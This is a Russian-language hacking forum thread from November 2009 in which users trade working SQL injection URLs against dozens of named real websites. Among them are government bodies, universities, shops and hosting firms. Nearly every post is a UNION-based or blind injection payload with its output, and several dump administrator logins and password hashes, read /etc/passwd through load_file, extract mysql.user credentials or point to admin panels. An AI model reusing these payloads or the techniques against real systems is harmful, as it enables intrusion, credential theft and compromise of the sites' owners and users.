http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,2 ,3,4,5,6,7,concat_ws(0x3a,user(),database(),versio n()),9,10,11,12,13,14,15--
sercanak_main@localhost:sercanak_ctav2:5.0.81-community-log
Далее попал случайно
http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,t able_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+inf ormation_schema.tables+limit+21,100--
Table 'sercanak_ctav2.holiday_to_insurance' doesn't existUnknown column '_users' in 'where clause'
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home1/sercanak/public_html/ctaholidays/beta/classes/connection.cls.php on line 53
Дальше крутите сами ;)
http://www.hlhclub.ru/state.php?id=-45+union+select+1,2,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),4--
hlhclu01@fe74.hc.ru:wwwhlhclubru:4.1.25-log:portbld-freebsd6.4
*uNkN0Wn*
05.11.2009, 12:37
http://www.discusmedia.com/catalog.php?id=24751+and+1=0+ Union Select 1,2,3,4,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35
photoeu@74.220.215.75:photoeu:5.0.75:pc-linux-gnu
http://www.foodlink.ru/index.php?category=-4+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5--
5.0.87:food1@localhost:foodlink
http://www.el-star.ru/useful.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),database(),user()),3,4,5,6,7,8--
4.1.25-log:wwwanthostnet:anthost@localhost
http://catalog.arh-info.ru/index.php?cat=2&subcat=8+union+select+1,2,3,concat_ws(0x3a,version (),database(),user()),5--
5.0.77:www_new_catalog:nmarroot@localhost
http://www.samarainfo.ru/index.php?category=13+union+select+1,2,concat_ws(0 x3a,version(),user(),database()),4,5
5.0.77:samarainfo_root@localhost:samara_info
Таблица: dev_admin1t
*uNkN0Wn*
05.11.2009, 15:12
http://www.marsvenus.com/members/articles.php?id=-42+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version(),@@version_compile_os),5,6,7,8,9%20, 10,11,12,13,14,15,16,17,18,19,20--
dbo204999831@localhost:db204999831
4.0.27-standard:pc-linux-gnu
http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,column_na me),6+from+information_schema.columns+where+table_ name=0x70687062625f666f72756d7573657273--
MySQL 5.1.36-log
http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,username, 0x3a,user_password),6+from+phpbb_forumusers--
http://www.skylink39.ru/catalog.php?id=64+union+select+1,2,3,concat_ws(0x2 03B20,user(),database(),version()),5,6,7,8,9,10,11 ,12,13+--+
User: skylink2_mysql@10.1.93.176
Database: skylink2_db
Version: 4.1.22-log
http://www.endchildpoverty.org.uk/news.php?id=-23+union+select+1,2,3,version(),5,6,7,8,9--
5.0.44
http://www.herpconstrust.org.uk/news/expand-news.php?id=-85+union+select+1,2,3,4,user(),6,7,8--
4.1.19-standard-log
http://vintage-avenue.com/details.php?id=-102+union+select+1,concat_ws(0x3a,version(),databa se(),useR(),@@version_compile_os),3,4,5,6,7,8,9,10--
Database Version: 4.1.22-log
Database name: whvintagexpresscom
User name: vintagexpressco@193.226.163.129
Os: redhat-linux-gnu
http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),d atabase(),useR(),@@version_compile_os),6,7,8,9,10, 11,12,13,14,15--
http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,utilizator, parola),6,7,8,9,10,11,12,13,14,15+from+admin+limit +1,1--
admin:e0ee1d48f2a4697296e3e30d47cb2c
админка есть по класическому адресу, но хеш очень интересный так как гуру брутеры и хешкрякеры не смогли опознать его
Database Version: 5.0.51a-3ubuntu5.4
Database name: granit_store
User name: granitstore@localhost
Os: debian-linux-gnu
http://www.goldcoastoceanfest.co.uk/news.php?id=-1+union+select+1,version(),3,4--
5.0.44
ILYAtirtir
05.11.2009, 23:08
Федеральная власть в Татарстане
http://www.federal16.ru/index.php?page=content&DocID=6585&nmonth=1259614800&ndate=22)+union+select+1,2,3,4,5,6,concat_ws(0x3a, database(),user(),version()),8,9,10,11,12/*
federal16:federal16@localhost:4.0.20-log
Всемирная организация "Объединенные города и местные власти" Евроазиатское Региональное Отделение
http://www.euroasia-uclg.ru/index.php?i=252+union+select+concat_ws(0x3a,databa se(),user(),version())
b53750_russian:u53750@78.108.84.81:5.0.85
Дизайн-студия "Амигос" - логотипы, фирменный стиль, создание сайтов, полиграфия, веб дизайн, регистрация доменов. Казань
http://www.samigos.ru/index.php?i=2&v=1&cat=-3+union+select+1,2,concat_ws(0x3a,database(),user( ),version())
samigos_samigos:samigos_samigos@localhost:4.1.22-standard
тиц 120
http://www.studycanada.ru/cgi-bin/issue.cgi?action=showforum&cat_id=18&fid=3/**/union/**/select/**/1,concat_ws(char(58,58),user(),database(),version( )),3,4,5,6,7/*
main1@localhost::canada::4.1.20
http://do.omgups.ru/content.php?session=0&fid=-3+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5+--+
User: root@localhost
Database: do
Version: 5.0.51b-community-nt
HAXTA4OK
06.11.2009, 10:22
http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=2+union+select+1,concat_Ws(0x3a,user(),data base(),version()),3,4--
web5@localhost:usr_web5_1:4.0.15-Max
http://www.eicta.org/index.php?id=32&id_article=50+and+substring(version(),1,1)=5--
http://www.shooflypublishing.co.uk/news.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9,10--
4.1.22 standart
TurboTROYAN
06.11.2009, 16:28
http://starkis.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())--
starkis1@localhost:5.0.24-standard:db_starkis1
тиц 10
pelligrim
06.11.2009, 17:16
http://www.fcshakhter.by/stat_docs.php?cid=-1+union+select+1,cast(concat_ws(0x3a,version(),dat abase(),user())+as+binary),3,4,5--
4.1.11-Debian_4sarge8-log:fcshakhter:fcshakhter@localhost
http://top.mlmbiz.ru/detail.php?id=207+and+substring(version(),1,1)=4
4.0.27-max-log
DezMond™
06.11.2009, 19:21
http://planit.cuna.org/12881/article.php?doc_id=-943'+union+select+1,2,3,4,5+--+
http://www.airram.com/gallery.php?categoryid=3+union+select+1,2,3,4,5,6, 7,8,9+--+
http://businessandfinancemagazine.com/magazine.php?id=-59+union+select+1,concat_Ws(0x3a3a,username,passwo rd),3,4,5,6,7,8,9,10+from+www_users+--+
http://www.pracawmetropolii.co.uk/search.php?id=-2869+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20+--+
http://bfbusinessclub.com/view.php?id=-552+union+select+1,group_concat(table_name),3,4,5, 6,7,8,9,10,11,12,13,14+from+information_schema.tab les+--+
http://www.treasurevalleykidsdirectory.com/magazine.php?id=-55+union+select+1,2,concat_ws(0x3a3a,username,pass word)+from+users+/*+
[x60]unu
06.11.2009, 20:19
k-konstruktor.ru - TC=10
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,version(),1,1/**/from/**/sys_users
version - 5.0.51a-24+lenny2-log
user - k_konstruktor_ru@localhost
database - k_konstruktor_ru
table - sys_users (user_password, user_login )
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,concat(user_login,0x3a,user_password),1, 1/**/from/**/sys_users
admin panel - http://k-konstruktor.ru/admin/logon/index.html
mailbrush
06.11.2009, 20:46
http://www.calvert-wire.com/show_product.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())
root@localhost:calvert_wirecom1:5.1.30-community
http://www.calvert-wire.com/show_product.php?id=-1+union+select+load_file('C:/Inetpub/wwwroot/calvert-wire/show_product.php')
hack-win32
06.11.2009, 20:47
bbeheer@localhost:cvc:5.0.37-community
http://www.cvc.nl/trainers.php?id=-25+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), database(),version()),8,9--
ruf_user@localhost:ruf_http:5.0.45-community-nt
http://www.rockiurbanfitness.com.au/trainers.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version())--
tcbo01be@localhost:bosterhout:4.1.21-standard
http://www.tcbosterhout.be/trainers.php?id=-9+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8--
silencej@62.182.63.19:silencej:5.1.34-0.dotdeb.0
http://www.pianc.org/edits/article.php?id=-4000501+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, user(),database(),version()),9,10,11,12,13,14,15,1 6,17,18,19,20,21--
*uNkN0Wn*
06.11.2009, 22:02
http://www.myworldhardware.com/v4/articles.php?ID=104&Page_ID=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e%20(),version(),@@version_compile_os),5--
myworldhw_data01@localhost:myworldhw_data01:5.0.67-community:redhat-linux-gnu
http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5+from+information_schema.columns+where+table_na me=0x61757468&img=
MySQL 5.0.77
http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,useri d,0x3a,pass),4,5+from+auth&img=
auth::id,
userid,
pass,
cognome,
nome,
permessi,
vedimodi,
expertmode,
progettista,
disegnatore,
costo,
attivo
http://www.kingmotors.ru/view_car_sold.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23--
4.1.22-lk-log:kingmotors_king:kingmotors_king@localhost:pc-linux-gnu
Sex shop Oo
http://www.buderotic.com/shop.php?type=-19 union select 1,concat_ws(0x2d ,version(),user(),da tabase()),3 --
5.0.87:buderoti_site@localhost:buderoti_buderotic
http://lipari.ru/?pageID=-1 union se lect 1,concat_w s(0x2d,version(),user(),database()) --
5.0.51a-15-log:u1697@george-in:u1697
http://www.iglobalforum.com/conference_live.php?r=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a3a,user(),database(),version()),13,14,15,16,17, 18,19,20+--+
*uNkN0Wn*
07.11.2009, 09:51
http://ldei.ugr.es/ldei/inv/inv.php?id=-3+Union+Select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14 --
root@localhost:biblioteca
Version: 5.0.51b-community-nt-log
hack-win32
07.11.2009, 12:29
rim1234@localhost:marmoon:5.0.51a-24+lenny1-log
http://www.marmoon.com/games.php?id=-464+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5,6,7,8,9,10,11,12,13--
yoquiero_dan@localhost:yoquiero_games:4.1.22-standard
http://www.yoquierogames.com/games.php?id=-98+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13--
rebous@localhost:rebounddb:4.1.22-log
http://www.reboundsports.co.uk/tips-games.php?id=-34+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31--
pelligrim
07.11.2009, 15:12
http://www.present-show.ru/corporate.php?id=-1+union+select+1,2,3,4,cast(concat_ws(0x3a,version (),database(),user())+as+binary),6,7,8,9,10,11--
4.1.11-standard:db_presentshow:presentshow@localhost
http://www.yamaha-center.ru/?vid=opis&obj=v&id=-3+union+select+concat_ws(0x3a,version(),database() ,user()),2--
4.1.25-log:wwwkottedg_clubru_specuch:kottedgc_specuch@loc alhost
http://www.mos-afisha.ru/?page=17&id=-3+union+select+concat_ws(0x3a,version(),database() ,user())--
4.1.22-log:melbis:melbis@10.0.1.201
http://backgammon.gambler.ru/tournir/arch.php?tournir_id=-11+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os)--
5.0.85:keks:keks@localhost:portbld-freebsd7.2
http://www.vashstile.ru/profile.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4,5,6,7,8,9,10--
5.0.22-log:admin_vashstile:admin_vashstile@localhost:unkn own-freebsd6.0
http://www.pin-code.ru/?pageId=1&subId=1+union+select+1,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),3,4,5,6,7,8, 9,10
5.0.77-log:pincode:pincode@localhost:portbld-freebsd6.3
http://www.funkit.ru/index.php?deviceCatID=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())
funkit@localhost:funkit:5.0.77
http://www.9-ka.ru/index.php?nav=1'/**/union/**/select/**/1,concat_ws(0x3a,user(),database(),version()),3,4, 5/*
только вот у меня проблема тут юзера не выводит
http://feodorovski.spb.ru/katalog.php?vars=1+union+select+1,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
5.1.19-beta:feodorovski:feodorovski@localhost:portbld-freebsd6.2
[x60]unu
07.11.2009, 16:25
http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user(),1,version(),1,1,1,1/**/from/**/sys_users/**/limit/**/0,1
user - pecpl_ru@localhost
version - 5.0.51a-24+lenny2-log
database - pecpl_ru
table - sys_users (user_login, user_password)
http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user_login,3,user_password,5,6,7,8/**/from/**/sys_users/**/limit/**/0,1
adminpanel - http://pecpl.ru/admin/logon/index.html
heyda4her
07.11.2009, 18:33
http://www.pharmacy-pal.com/product.php?cid=415
http://www.pharmacy-pal.com/product.php?cid=415+and+1=2
http://www.pharmacy-pal.com/product.php?cid=14)+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT(0x7873 716C696E6A626567696E,Version(),0x2F2A2A2F,Database (),0x2F2A2A2F,User(),0x7873716C696E6A656E64),23,24 ,25,26/*
pharmacy_altec@localhostxsqlinjend
Root-access
07.11.2009, 23:26
Вот небольшая партия sql-инъекций на довольно популярных сайтах:
ГУ-ВШЭ: _http://www.hse.ru/pressa2002/default.php?show=123+and+ascii(lower(substring(ver sion(),1,1)))=51
UpTime: _http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,5,6,7,8,9,10,11, 12+from+users+limit+1,1
МИОО: _http://www.mioo.ru/podrnews2.php?idvalue=2144+and+ascii(substring(ver sion(),1,1))=53/*
ManageeCMS: _http://www.managee.ru/system/admin/?module=entry&action=edit&block=gallery&master_id=' (нужно авторизоваться на _http://www.managee.ru/demo/)
_http://managee.ru/search/?q=%27&strict=0
ПЦУО: _http://couo.ru/search.asp (ввести ')
MSSQL
http://www.hotellikajaani.fi/index.asp?pid=79%27+or+79=(select+top+1+table_name +from+information_schema.tables+where+table_name+n ot+in+(%20%27www_pagelogic%27,%27www_pagetype0_set tings%27,%27www_pagetype1_settings%27,%27www_paget ype2_settings%27,%27www_pagetype3_settings%27,%27w ww_pagetype4_settings%27,%27www_pagetype8_settings %27,%27www_pagetypes%27,%27www_settings%27,%27www_ template1c_specs%27))%20--
http://www.championchip.fi/index.asp?pid=8%27+or+8=@@version%20--
PR 4
http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 ,13,14,15+from+information_schema.columns+where+ta ble_name=0x6d6f64466565646261636b55736572--
MySQL 5.0.45-log
http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,login,0x3a,password),12,13,14,15+from+modFeedback User--
modFeedbackUser::id:name:login:,password:,post
http://www.yu-tour.ru/admin
выводит все строки сразу
Rolemancer
http://rolemancer.ru/sections.php?op=listarticles&secid=-87 union select concat_ws(0x3a ,user(),version( ),database()),2,3,4,5
rolemancer@localhost:5.0.75-0ubuntu10.2:rolemancer
http://www.graphicjunkiehosting.co.uk/knowledgebase/index.php?cat=1+group+by+1+union+select+1,2,versio n()/*
mssql 2008: http://kbaptupa.ru/dir/linkdetail.aspx?id=764+order+by+6+--
msaccess: http://www.sectsco.org/RU/show.asp?id=304+or+1=1
pr 7 cy 160, оф. сайт шанхайской организации сотрудничества, лол.
http://www.wargames.ru/sections.php?op=listarticles&secid=-299 union all select 1,concat_ ws(0x3a,user(),database(),version()),3,4,5
wargames@localhost:Wargames:5.0.75-0ubuntu10.2
http://www.ccg.ru/sections.php?op=listarticles&secid=-291 union all select 1,concat_ws(0x3a,user(),database( ),version()),3,4,5 --
ccg@localhost:CCG:5.0.75-0ubuntu10.2
http://www.alfacomponent.com/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),u ser(),version(),@@version_compile_os),6
alfachip_alfacomponent:alfachip_user@localhost:4.0 .27-standard:pc-linux-gnu
Таблицу не смог найти (
[x60]unu
08.11.2009, 17:37
theanimatedseries.890m.com -
http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,version(),3,4,5+from+users--
version - 5.0.81-community
user - a1811734_madnote@localhost
database - a1811734_imanga
table - users (username, password)
http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,concat_ws(0x3a,username,password),3,4,5+from+use rs--
admin panel - http://theanimatedseries.890m.com/admin/
5.0.21 : rootr@localhost : % : rootr : : Y
http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,concat_ws(0x203a20,version(),us er(),host,user,password,file_priv),3,4+from+mysql. user+limit+1,1--
http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,load_file(0x2f6574632f706173737 764),3,4--
http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_ name),7,8,9,10,11,12,13+from+information_schema.co lumns+where+table_name=0x64635f75736572
dc_user::user_id:user_level:user_pwd:user_nom:user _prenom:user_pseudo:user_email:user_post_format:us er_edit_size:user_pref_cat:user_lang:user_delta:us er_post_pub
MySQL 5.0.32-Debian_7etch11-log
http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,user_id ,0x3a,user_email,0x3a,user_pwd,0x3a,user_level),7, 8,9,10,11,12,13+from+dc_user
softbb_membres::http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_ name),7,8,9,10,11,12,13+from+information_schema.co lumns+where+table_name=0x736f667462625f6d656d62726 573
DezMond™
08.11.2009, 19:16
http://www.painkillerz.ca/archive.php?type=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+--+
https://www.magazineburst.com/newsite/magazine.php?mag=-424+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,gro up_concat(table_name)+from+information_schema.tabl es+/*+
http://cosmoguayana.net/galeria_prensa.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,cont rasena,nombre,apellido,email,tipo,estado),6,7,8,9, 10,11+from+usuarios+limit+2,1+--+
http://www.chiroeco.com/article/chiropractic-magazine.php?id=-113+union+select+concat_ws(0x3a3a,username,passwor d,section)+from+administrators+limit+1,10+--+
http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group _concat(0x0b,column_name)+from+information_schema. columns+where+table_name=0x6163636f756e7473
accounts::userid:username:passhash:logouttime:acco unttype:contact:comments
http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group _concat(0x0b,username,0x3a,passhash,0x3a,accountty pe)+from+accounts
MySQL 5.0.81-log
логинимсо http://yocshoppe.com/loginAccount.php
http://www.nolting.com/article.php?i=999+union+select+1,concat_ws(0x3a,us er(),version(),database()),table_name,4+from+infor mation_schema.tables/*
nmdbadmin@localhost:5.0.45-community-nt:nolting
PR: 3
http://odb.tamboff.ru/index.php?id=-9+union+select+unhex(hex(concat_ws(0x3a,version(), user(),database())))--&place=content
4.1.11:оdb@localhost:оdb
тиц=110
http://www.ib.ru/news/index.php?id=-999+union+select+1,concat_ws(0x3a,version(),user() ,database()),2,3,5,6,7
5.0.45-log:ib@localhost:ibnews
ТИЦ: 425
http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,concat_ws(0x3a,user,0x3a,pas sword,0x3a,file_priv),4,5,6,7,8+from+mysql.user
MySQL 5.0.76-log
http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,load_file(0x2f6574632f706173 737764),4,5,6,7,8 - Чтение файлов на серве
http://www.rusich-media.ru/admin типа админко
ILYAtirtir
09.11.2009, 04:46
Межпарламентская Ассамблея государств - участников Содружества Независимых Государств
http://www.iacis.ru/html/?id=17&nid=94899+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,concat_ws(0x3a,database(),user(),version()),15, 16,17,18,19,20,21,22/*
iacis:iacis@localhost:4.1.20
Управление Федеральной регистрационной службы по Пермскому краю
http://frs.perm.ru/about/normativ/?action=view&id=777+union+select+1,concat_ws(0x3a,database(),us er(),version()),3,4,5
dbfrs2:frs@localhost:4.0.24_Debian-10sarge3-log
Управление Федеральной миграционной службы
по Пермскому краю
http://fms.permregion.ru/index.php?Id=105+and+substring(version(),1,1)=5/*
Сибирский Федеральный Округ
http://www.sibfo.ru/news/speech.php?action=art&nart=5532+and+substring(version(),1,1)=3
ЦЕНТР ОБЩЕСТВЕННОЙ БЕЗОПАСНОСТИ - ЦЕНТУРИОН
http://centurion.gov12.ru/clenspage-detail.htm?page_id=1'+and+substring(version(),1,1) =5/*
Информационное агентство "Федеральные Новости"
http://federalinform.ru/regnews.htm?ownrubric_id=3'%20and%20substring(vers ion(),1,1)=5/*
http://www.belarus.kz/index.php?mod=news&nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
http://tilashar.kz/forum/message.php3?pagelist=20&messageID=-1+union+select+1,2,3,4,5,6,7,8,9,10--+
http://staff.kz/page.php?content=vacancy_view&uin=-1+union+select+password+from+admins--+
http://dknews.kz/article.php?id=-1+union+select+1,2,3--+
http://okp.kz/comp_view_vacancy.php?vac_id=-1+union+select+1,2,3,4,5,6,7,8,9--+
http://www.zhebrivskiy.org/pages.php?id=-1+union+select+1,2,3,4--+
http://www.clearflourbread.com/news.php?news_id=1-1+union+select+1,2,3,4--+
http://autoshina.kh.ua/news.php?idnews=-1+union+select+1,2,3--+
http://www.rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,3,4,5,6,7--+
http://www.egmont.ru/journals/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--+&print=yes
Проявляю активность! =)
http://www.southveter.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10+--+
mailbrush
09.11.2009, 13:20
тИЦ: 130
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6+from+cms_admin
root@zvm11:rusconsultru:5.0.77
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6+from+cms_admin
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,use r_pass),5,6+from+wp_users
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user,password) ,5,6+from+mysql.user
[x60]unu
09.11.2009, 14:10
зарубежный хостинг :
http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),version(),database(),us er(),@@version_compile_os),3/**/from/**/plans
version - 5.0.81-community-log
database - lithiumh_lithium
user - lithiumh_lithium@localhost
os - unknown-linux-gnu
http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),ftp,domains,link),3/**/from/**/plans
пр 5
http://www.ukrainianjournal.com/index.php?w=article&id=-9174+union+select+1,2,concat_ws(0x3a,id,login,pass word),4,5,6,7+from+uajournal_db.users--
Database Version: 5.0.85-log
Database name: uajournal_db
User name: uajournal_user@10.0.0.3
http://www.urheilupuisto.com/index.php?id=-5+and+1=0+union+select+concat_ws(0x3a,version(),us er(),database()),2,3,4--
5.0.82sp1-enterprise-gpl:w3452267db@10.0.8.82:w3452267db
http://www.knowmag.ca/knowitalls/index.php?id=5+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3--
4.0.27:know@199.175.106.40:know_db
http://www.verbenahotel.ru/index.php?id=-999+union+select+1,concat_ws(0x3a,version(),user() ,database()),3--
5.0.77:hotel_user@localhost:hotel_data
http://www.pizzifarm.com/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--
4.1.20:pizziadmin@localhost:pizzibs
maestra_toys
09.11.2009, 14:56
Ребята, а зачем вы все выкладываете это?
Если надо, то вот от меня:
http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,us er(),database(),version()),5,6%20--
http://www.daily-rent.ro/details.php?lang=en&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11/*
Database Version: 5.0.24a
Database name: daily_rent
User name: mihai-mir@localhost
Os: slackware-linux-gnu
_http://www.fcdenderdetime.be/news.php?id=-4+union+select+1,2,version(),4,5--
5.0.32-Debian_7etch11-log
http://www.netfestival.be/pages/news.php?id=-7+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8--
netfestinetfst:netfestinetfst@10.0.85.248:4.0.25-standard-log
http://www.abyssplongee.be/news.php?cid=26&id=-16+union+select+1,unhex(hex(group_concat(table_nam e+separator+0x0b))),3,4+from+information_schema.ta bles--
_http://www.hotel-ste-cecile.be/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8--
http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,column_name,6,7+from+inform ation_schema.columns+where+table_name=0x6f696c5f75 73657273
MySQL 5.0.26-log
oil_users::
id:name:,pass:type:session
http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass ,type,session),6,7+from+oil_users
выводит все строки сразу
[x60]unu
09.11.2009, 20:01
99px.ru - мир аватарок))) TC=20
http://99px.ru/avatar/?pid=13031/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13/*
version - 4.1.22
database - px99ru
user - px99ru@localhost
os - portbld-freebsd6.3
http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,column_name),3, 4+from+information_schema.columns+where+table_name =0x61646d696e
admin::id:fullname:username:,password:level:userem ail
MySQL 5.0.75
http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,usernam e,0x3a,password,0x3a,useremail,0x3a,level),3,4+fro m+admin
http://www.rohouse.com/details.php?id=964+UNION+SELECT+1,2,3,4,5,6,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65+LIMIT+1,1--
Database Version: 5.0.77-log
Database name: rohouse_com
User name: pinatubo@localhost
Os: redhat-linux-gnu
[x60]unu
10.11.2009, 00:44
разработки и дизайн сайтов - ТС=20
Blind SQL -
http://rireg.net/index.php?page=procjects&show=35/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)
version - 5.0.45
Решил вспомнить, как это делается..
_ttp://www.veriflora.com/findveri-client-list.php?id=-1+UNION+SELECT+1,2,concat%28table_name,CHAR%2845,6 1,45%29,column_name%29,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+fr om+information_schema.columns--
я хз, как там пароли зашифрованы.
UPD, офигеть, пол-второго ночи..
http://skytexalliance.com/index.php?id=15&p=1&tid=1+union+select+1,2,3,concat_ws(0x3a,version(), database(),user())
4.0.27-max-log:db171625947:dbo171625947@74.208.16.88
http://www.ac-psych.org/index.php?id=1+union+select+concat_ws(0x3a,version (),database(),user())
5.0.33-log:acpsych_ac-psych:acp_ac-psych@81.2.203.24
http://www.imperian.com/players.php?search=deathlog&day=1+and+(substring(version(),1,1))=4
version() - 4.1.20-log
http://mat.fobo.ru/show.php?show=-1234'+union+select+1,concat_ws(0x3a,user(),databas e(),version(),@@basedir)+--+
User:fobomat@localhost
Database:fobomat
Version: 5.0.51a-19-log
BaseDir: /usr/
LokbatanLi
10.11.2009, 11:13
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1'a
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1+union+selec+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17
Versiya: 5.0.67-log
User: adminclt_13@209.68.2.10
Database: adminclt_testsite
OS: unknown-freebsd6.2
